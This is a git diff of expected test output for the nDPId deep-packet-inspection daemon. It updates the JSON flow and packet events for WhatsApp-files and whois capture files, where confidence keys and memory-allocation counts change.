+00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924083411,"flow_last_seen":1519924083598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":1641,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1519924083598,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01333{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1519924083411,"flow_last_seen":1519924083599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":3451,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1519924083599,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","server_names":"*.cdn.whatsapp.net,*.snr.whatsapp.net,*.whatsapp.com,*.whatsapp.net,whatsapp.com,whatsapp.net","ja3":"107144b88827da5da9ed42d8776ccdc5","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=Menlo Park, O=Facebook, Inc., CN=*.whatsapp.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"10:54:EB:4A:A2:2A:42:2F:A6:1C:E7:9C:F4:84:10:7E:30:2E:56:BB"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1519924240121,"flow_last_seen":1519924240121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1519924240121,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1519924240121,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1519924240121,"pkt":"XEl5dU5qkLkxKPrKCABFAABAAABAAEAG5oDAqAIduTzYNcIiAbuCj0EnAAAAALDC\/\/+6MAAAAgQFtAEDAwYBAQgKKOd3WAAAAAAEAgAA"} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1519924240177,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1519924240177,"pkt":"kLkxKPrKXEl5dU5qCABFAAA8AABAAFUG0YS5PNg1wKgCHQG7wiLPr2ypgo9BKKASbTgw1AAAAgQFggQCCAq3hjooKOd3WAEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1519924240182,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1519924240182,"pkt":"XEl5dU5qkLkxKPrKCABFAAA0AABAAEAG5ozAqAIduTzYNcIiAbuCj0Eoz69sqoAQCAXEZQAAAQEICijnd5W3hjoo"} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924240121,"flow_last_seen":1519924240183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1519924240183,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924240121,"flow_last_seen":1519924240244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1519924240244,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1519924083411,"flow_last_seen":1519924193429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":183524,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} -00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":310,"flow_first_seen":1519924240121,"flow_last_seen":1519924247388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":226819,"flow_avg_l4_payload_len":731,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1519924240121,"flow_last_seen":1519924240183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1519924240183,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":316,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1519924240121,"flow_last_seen":1519924240244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1519924240244,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mmg-fna.whatsapp.net","ja3":"4e1a414c4f4c99097edd2a9a98e336c8","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1519924083411,"flow_last_seen":1519924193429,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":183524,"flow_avg_l4_payload_len":592,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1519924240121,"flow_last_seen":1519924247388,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":226819,"flow_avg_l4_payload_len":731,"midstream":0,"thread_ts_msec":1519924247388,"l3_proto":"ip4","src_ip":"192.168.2.29","dst_ip":"185.60.216.53","src_port":49698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":620,"source":"whatsappfiles.pcap","alias":"nDPId-test","packets-captured":620,"packets-processed":620,"total-skipped-flows":0,"total-l4-payload-len":410343,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1519924247388} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 620/620 @@ -24,9 +24,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5899028 bytes -~~ total memory freed........: 5899028 bytes -~~ total allocations/frees...: 118752/118752 +~~ total memory allocated....: 6032662 bytes +~~ total memory freed........: 6032662 bytes +~~ total allocations/frees...: 121514/121514 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 1338 chars diff --git a/test/results/whois.pcapng.out b/test/results/whois.pcapng.out index 4907f385e..7f1b8b127 100644 --- a/test/results/whois.pcapng.out +++ b/test/results/whois.pcapng.out @@ -4,21 +4,21 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1507397119066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1507397119066,"pkt":"UlQAEjUCCAAnPqwxCABFAAA8folAAEAGwOgKAAIPwAAvO6ycACuFe1kCAAAAAKACchD7eAAAAgQFtAQCCAqvatNhAAAAAAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1507397119183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1507397119183,"pkt":"CAAnPqwxUlQAEjUCCABFAAAsSF0AAEAGNyXAAC87CgACDwArrJwAl14BhXtZA2AS\/\/+y7QAAAgQFtAAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1507397119183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1507397119183,"pkt":"UlQAEjUCCAAnPqwxCABFAAAofopAAEAGwPsKAAIPwAAvO6ycACuFe1kDAJdeAlAQchD7ZAAA"} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507397119066,"flow_last_seen":1507397119183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1507397119183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1507397119066,"flow_last_seen":1507397119183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1507397119183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":12,"packets-processed":11,"total-skipped-flows":0,"total-l4-payload-len":246,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1604305198454} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1604305198454,"flow_last_seen":1604305198454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1604305198454,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1604305198454,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"thread_ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB5BrfTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1604305198454,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":86,"pkt_l4_len":48,"thread_ts_msec":1604305198454,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAAROArQAB4BrjTChEiiwoRMwj6EBD3\/zhGhgAAAADAAvrwy1EAAAIEBWoBAwMIAQEEAkwKAQEKEf5EAAVMBAwhAQA="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1604305198460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":70,"pkt_l4_len":32,"thread_ts_msec":1604305198460,"pkt":"AAAAAAAAAAgAAAADgQAGQwgARQAANARIQAB9Bo\/HChEzCAoRIosQ9\/oQPm9gn\/84RoeAEiAA9XQAAAIEBbQBAwMIAQEEAg=="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1604305198454,"flow_last_seen":1604305198677,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1604305198677,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"649d6810e8392f63dc311eecb6b7098b","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384","issuerDN":"CN=10.17.51.7","subjectDN":"CN=10.17.51.7, CN=10.17.51.7","alpn":"h2,http\/1.1","fingerprint":"DD:4E:28:9B:08:C1:D5:63:D1:B6:FC:DD:FD:91:A9:D4:E3:A8:7F:D5"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1507397119066,"flow_last_seen":1507397119369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1604305198454,"flow_last_seen":1604305198677,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1604305198677,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"649d6810e8392f63dc311eecb6b7098b","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384","issuerDN":"CN=10.17.51.7","subjectDN":"CN=10.17.51.7, CN=10.17.51.7","alpn":"h2,http\/1.1","fingerprint":"DD:4E:28:9B:08:C1:D5:63:D1:B6:FC:DD:FD:91:A9:D4:E3:A8:7F:D5"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1507397119066,"flow_last_seen":1507397119369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"192.0.47.59","src_port":44188,"dst_port":43,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","packets-captured":19,"packets-processed":18,"total-skipped-flows":0,"total-l4-payload-len":1806,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1623517268690} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623517268690,"flow_last_seen":1623517268690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623517268690,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623517268690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":62,"pkt_l4_len":24,"thread_ts_msec":1623517268690,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAALKUxAAAtBrE+wB4tHgqgP4AAK8\/hR0rdvNStq\/tgEgW05awAAAIEBVA="} 02064{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623517269021,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"thread_ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2B35AAAtBjPLwB4tHgqgP4AAK8\/hR0rdvdStrBVQGAW0T9cAACAgIERvbWFpbiBOYW1lOiBDWUJFUlBBVFJPTEJELkNPTQ0KICAgUmVnaXN0cnkgRG9tYWluIElEOiAyMTUzNDAwMTAwX0RPTUFJTl9DT00tVlJTTg0KICAgUmVnaXN0cmFyIFdIT0lTIFNlcnZlcjogd2hvaXMuUHVibGljRG9tYWluUmVnaXN0cnkuY29tDQogICBSZWdpc3RyYXIgVVJMOiBodHRwOi8vd3d3LnB1YmxpY2RvbWFpbnJlZ2lzdHJ5LmNvbQ0KICAgVXBkYXRlZCBEYXRlOiAyMDIwLTA4LTI5VDA3OjQxOjUyWg0KICAgQ3JlYXRpb24gRGF0ZTogMjAxNy0wOC0xNFQxNjoxMDo1MVoNCiAgIFJlZ2lzdHJ5IEV4cGlyeSBEYXRlOiAyMDIxLTA4LTE0VDE2OjEwOjUxWg0KICAgUmVnaXN0cmFyOiBQRFIgTHRkLiBkL2IvYSBQdWJsaWNEb21haW5SZWdpc3RyeS5jb20NCiAgIFJlZ2lzdHJhciBJQU5BIElEOiAzMDMNCiAgIFJlZ2lzdHJhciBBYnVzZSBDb250YWN0IEVtYWlsOiBhYnVzZS1jb250YWN